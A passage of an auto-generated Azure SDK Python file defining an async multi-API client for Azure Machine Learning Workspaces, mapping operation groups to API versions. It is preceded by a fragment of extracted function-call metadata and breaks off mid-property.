sklearn.metrics import roc_curve, auc\n'), ((2805, 2816), 'sklearn.metrics.auc', 'auc', (['xx', 'yy'], {}), '(xx, yy)\n', (2808, 2816), False, 'from sklearn.metrics import roc_curve, auc\n'), ((2830, 2861), 'numpy.interp', 'np.interp', (['reference_xx', 'xx', 'yy'], {}), '(reference_xx, xx, yy)\n', (2839, 2861), True, 'import numpy as np\n'), ((4491, 4540), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_filepath'], {'bbox_inches': '"""tight"""'}), "(output_filepath, bbox_inches='tight')\n", (4502, 4540), True, 'import matplotlib.pyplot as plt\n'), ((3644, 3674), 'numpy.mean', 'np.mean', (['auc_dict_list[method]'], {}), '(auc_dict_list[method])\n', (3651, 3674), True, 'import numpy as np\n')] |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from azure.profiles import KnownProfiles, ProfileDefinition
from azure.profiles.multiapiclient import MultiApiClientMixin
from msrest import Deserializer, Serializer
from ._configuration import AzureMachineLearningWorkspacesConfiguration
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
from azure.core.credentials_async import AsyncTokenCredential
class _SDKClient(object):
def __init__(self, *args, **kwargs):
"""This is a fake class to support current implemetation of MultiApiClientMixin."
Will be removed in final version of multiapi azure-core based client
"""
pass
class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient):
"""These APIs allow end users to operate on Azure Machine Learning Workspace resources.
This ready contains multiple API versions, to help you deal with all of the Azure clouds
(Azure Stack, Azure Government, Azure China, etc.).
By default, it uses the latest API version available on public Azure.
For production, you should stick to a particular api-version and/or profile.
The profile sets a mapping between an operation group and its API version.
The api-version parameter sets the default API version if the operation
group is not described in the profile.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param api_version: API version to use if no profile is provided, or if missing in profile.
:type api_version: str
:param base_url: Service URL
:type base_url: str
:param profile: A profile definition, from KnownProfiles to dict.
:type profile: azure.profiles.KnownProfiles
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
DEFAULT_API_VERSION = '2022-05-01'
_PROFILE_TAG = "azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces"
LATEST_PROFILE = ProfileDefinition({
_PROFILE_TAG: {
None: DEFAULT_API_VERSION,
'assets': '1.0.0',
'async_operations': 'v1.0',
'batch_job_deployment': '2020-09-01-dataplanepreview',
'batch_job_endpoint': '2020-09-01-dataplanepreview',
'data_call': '1.5.0',
'data_container': '1.5.0',
'data_version': '1.5.0',
'dataset_containers': '2021-10-01',
'dataset_controller_v2': '1.5.0',
'dataset_v2': '1.5.0',
'dataset_versions': '2021-10-01',
'datasets_v1': '1.5.0',
'delete': 'v1.0',
'events': 'v1.0',
'experiments': 'v1.0',
'extensive_model': '1.0.0',
'get_operation_status': '1.5.0',
'metric': 'v1.0',
'migration': '1.0.0',
'models': '1.0.0',
'registry_management_non_workspace': 'v1.0',
'run': 'v1.0',
'run_artifacts': 'v1.0',
'runs': 'v1.0',
'spans': 'v1.0',
'temporary_data_references': '2021-10-01-dataplanepreview',
}},
_PROFILE_TAG + " latest"
)
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
api_version: Optional[str] = None,
base_url: str = "https://management.azure.com",
profile: KnownProfiles = KnownProfiles.default,
**kwargs # type: Any
) -> None:
self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
super(AzureMachineLearningWorkspaces, self).__init__(
api_version=api_version,
profile=profile
)
@classmethod
def _models_dict(cls, api_version):
return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}
@classmethod
def models(cls, api_version=DEFAULT_API_VERSION):
"""Module depends on the API version:
* 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>`
* 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>`
* v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>`
* v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>`
* 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>`
* 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>`
* 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>`
* 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>`
* 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>`
* 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>`
"""
if api_version == '1.5.0':
from ..dataset_dataplane import models
return models
elif api_version == '1.0.0':
from ..model_dataplane import models
return models
elif api_version == 'v1.0':
from ..registry_discovery import models
return models
elif api_version == 'v1.0':
from ..runhistory import models
return models
elif api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview import models
return models
elif api_version == '2021-10-01':
from ..v2021_10_01 import models
return models
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview import models
return models
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview import models
return models
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview import models
return models
elif api_version == '2022-05-01':
from ..v2022_05_01 import models
return models
raise ValueError("API version {} is not available".format(api_version))
@property
def assets(self):
"""Instance depends on the API version:
* 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>`
"""
api_version = self._get_api_version('assets')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import AssetsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'assets'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def async_operations(self):
"""Instance depends on the API version:
* v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>`
"""
api_version = self._get_api_version('async_operations')
if api_version == 'v1.0':
from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'async_operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_deployments(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>`
* 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>`
* 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>`
"""
api_version = self._get_api_version('batch_deployments')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_deployments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_endpoints(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>`
* 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>`
* 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>`
"""
api_version = self._get_api_version('batch_endpoints')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_endpoints'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_job_deployment(self):
"""Instance depends on the API version:
* 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>`
"""
api_version = self._get_api_version('batch_job_deployment')
if api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_job_deployment'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_job_endpoint(self):
"""Instance depends on the API version:
* 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>`
"""
api_version = self._get_api_version('batch_job_endpoint')
if api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_job_endpoint'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def code_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>`
* 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>`
* 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>`
"""
api_version = self._get_api_version('code_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'code_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def code_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>`
* 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>`
* 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>`
"""
api_version = self._get_api_version('code_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'code_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def component_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>`
* 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>`
* 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>`
"""
api_version = self._get_api_version('component_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'component_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def component_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>`
* 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>`
* 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>`
"""
api_version = self._get_api_version('component_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'component_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def compute(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>`
* 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>`
* 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>`
"""
api_version = self._get_api_version('compute')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'compute'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_call(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>`
"""
api_version = self._get_api_version('data_call')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_call'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_container(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>`
"""
api_version = self._get_api_version('data_container')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_container'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_containers(self):
"""Instance depends on the API version:
* 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>`
* 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>`
"""
api_version = self._get_api_version('data_containers')
if api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_version(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>`
"""
api_version = self._get_api_version('data_version')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_version'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_versions(self):
"""Instance depends on the API version:
* 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>`
* 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>`
"""
api_version = self._get_api_version('data_versions')
if api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>`
"""
api_version = self._get_api_version('dataset_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_controller_v2(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>`
"""
api_version = self._get_api_version('dataset_controller_v2')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_controller_v2'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_v2(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>`
"""
api_version = self._get_api_version('dataset_v2')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_v2'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>`
"""
api_version = self._get_api_version('dataset_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def datasets_v1(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>`
"""
api_version = self._get_api_version('datasets_v1')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'datasets_v1'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def datastores(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>`
* 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>`
* 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>`
"""
api_version = self._get_api_version('datastores')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'datastores'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def delete(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>`
* v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>`
"""
api_version = self._get_api_version('delete')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass
elif api_version == 'v1.0':
from ..runhistory.aio.operations import DeleteOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'delete'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def environment_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>`
* 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>`
* 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>`
"""
api_version = self._get_api_version('environment_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'environment_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def environment_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>`
* 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>`
* 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>`
"""
api_version = self._get_api_version('environment_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'environment_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def events(self):
"""Instance depends on the API version:
* v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>`
"""
api_version = self._get_api_version('events')
if api_version == 'v1.0':
from ..runhistory.aio.operations import EventsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'events'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def experiments(self):
"""Instance depends on the API version:
* v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>`
"""
api_version = self._get_api_version('experiments')
if api_version == 'v1.0':
from ..runhistory.aio.operations import ExperimentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'experiments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def extensive_model(self):
"""Instance depends on the API version:
* 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>`
"""
api_version = self._get_api_version('extensive_model')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'extensive_model'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def get_operation_status(self):
"""Instance depends on the API version:
* 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>`
"""
api_version = self._get_api_version('get_operation_status')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'get_operation_status'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def jobs(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>`
* 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>`
* 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>`
"""
api_version = self._get_api_version('jobs')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import JobsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import JobsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'jobs'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def metric(self):
"""Instance depends on the API version:
* v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>`
"""
api_version = self._get_api_version('metric')
if api_version == 'v1.0':
from ..runhistory.aio.operations import MetricOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'metric'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def migration(self):
"""Instance depends on the API version:
* 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>`
"""
api_version = self._get_api_version('migration')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import MigrationOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'migration'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def model_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>`
